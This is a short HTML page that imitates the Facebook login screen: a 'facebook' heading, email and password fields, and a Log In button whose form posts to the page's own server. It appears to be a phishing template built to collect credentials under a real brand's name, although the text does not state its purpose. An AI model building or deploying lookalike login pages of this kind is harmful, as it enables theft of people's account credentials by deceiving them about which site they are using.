<!DOCTYPE html>
<html>
<head>
  <title>Facebook – log in or sign up</title>
  <link rel="stylesheet" href="/static/style.css">
</head>
<body>
  <div class="login-box">
    <h1>facebook</h1>
    <form method="POST">
      <input type="text" name="email" placeholder="Email address or phone number" required>
      <input type="password" name="password" placeholder="Password" required>
      <button type="submit">Log In</button>
    </form>
    <a class="forgot" href="#">Forgotten password?</a>
    <hr>
    <button class="create-btn">Create New Account</button>
  </div>
</body>
</html>
